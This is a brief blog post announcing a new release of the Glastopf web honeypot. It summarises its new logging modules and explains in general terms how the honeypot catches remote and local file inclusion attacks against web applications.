Glastopf Webhoneypot Version 0.2.0
Lukas from Glasblog released a new version of his webhoneypot called Glastopf yesterday. Several new modules have been implemented including a Twitter and an IRC module to log current statistics and attack information. A complete changeset can be found here.
A webhoneypot can be used to detect remote/local file inclusion attacks against current webapplications, such as phpmyadmin or roundcube webmailer. The honeypot simulates several vulnerable webapplications and extracts injected commands from the incoming requests. A request can either try to load another file from a remote server, that is already under the control of the attacker and execute it in the context of the webserver. In some cases these remotely loaded files contain IRC bots, that allow the attacker to take control over the attacked system. Other methods to compromise the system include the gathering of information about the running operating system and then include some local root exploit to take complete control over the server.